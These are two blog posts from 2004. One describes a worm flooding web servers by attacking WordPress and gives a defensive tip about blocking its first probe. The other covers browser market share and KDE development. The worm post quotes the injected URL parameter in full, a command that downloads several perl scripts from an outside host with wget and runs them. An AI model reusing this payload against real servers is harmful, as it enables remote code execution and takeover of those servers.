Saturday, December 25, 2004

Flood

There is a worm that targets Wordpress that is flooding servers. It refers to www.visualcoders.net and tries to run perl scripts. I noticed a huge increase in traffic today, and in an attempt to stem the flow, did a bit of searching. http://wordpress.org/support/7/19285 gives some tips.

The key is to stop the first probe that has a user-agent of "lwp-trivial". On my site it would grab one of the links and then attack it. If the first probe is stopped however, the worm quits.

There was one hit on the 3rd, 11th and 17th of December, then just before 9AM PST the flood started. 303 different servers did 25,569 hits with the worm. The worm changes the &version and appends a &cmd to the url found in the page it gets from the first probe. Here is the added portion of the url, with linebreaks for readability: "&version=http://www.visualcoders.net/spy.gif? &cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt; wget%20www.visualcoders.net/worm1.txt; wget%20www.visualcoders.net/php.txt; wget%20www.visualcoders.net/ownz.txt; wget%20www.visualcoders.net/zone.txt; perl%20spybot.txt;perl%20worm1.txt; perl%20ownz.txt; perl%20php.txt"

The Wordpress support seemed to indicate that the worm checked whether Wordpress was running before initiating the attack. I don't run Wordpress, so it doesn't seem to matter. In other words most web servers will be generously donating bandwidth for nothing.


Thursday, December 09, 2004

Depressing

A number I saw the other day said that Internet Explorer's share of market has dropped to 92%. From 96% or so. Parades are being arranged in celebration of this major breakthrough.

Microsoft still has an almost insurmountable monopoly on the desktop, even after the horrible security problems of the last two years. Firefox is an alternative to a profoundly broken product.

I don't think anyone can say whether porting free software to Windows is a good idea. At least people can't get away with writing web pages only for IE. At least people aren't forced to use MS Office as there is an alternative. What happens when Microsoft fixes IE, adds tabs and other features?

Right now the Kde desktop is compelling. It will get better and better. Already the value proposition is excellent. But most people define their computing experience by what Microsoft provides. And almost everyone is tied into Microsoft solutions in some way. Big splashes and marketing pushes aren't going to get us there. It comes down to code. How about a concerted effort to recruit developers instead of users?

That being said, I fixed a number of nuisance things in the digest. There are links to the cia.navi.cx statistics site, some details are more polished. I'm working on the diff stuff right now, getting a full file diff working. The links and options need some thought and cleaning up.

I am looking for color scheme ideas. I'm happy with mud grey, but many people aren't. So if you have some conservative color scheme that looks good, drop me a line.


This page is powered by Blogger. Isn't yours?

Subscribe to Posts [Atom]